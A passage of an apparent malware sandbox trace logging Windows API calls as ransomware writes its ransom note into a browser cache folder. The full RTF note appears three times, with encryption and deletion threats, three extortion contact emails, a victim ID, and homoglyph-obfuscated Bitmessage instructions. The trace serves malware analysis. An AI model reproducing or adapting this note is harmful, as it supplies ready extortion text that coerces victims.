worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#readme_eman#.rtf")) returned 0xffffffff [0289.673] GetLastError () returned 0x2 [0289.673] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.681] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.681] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.682] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235fca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il 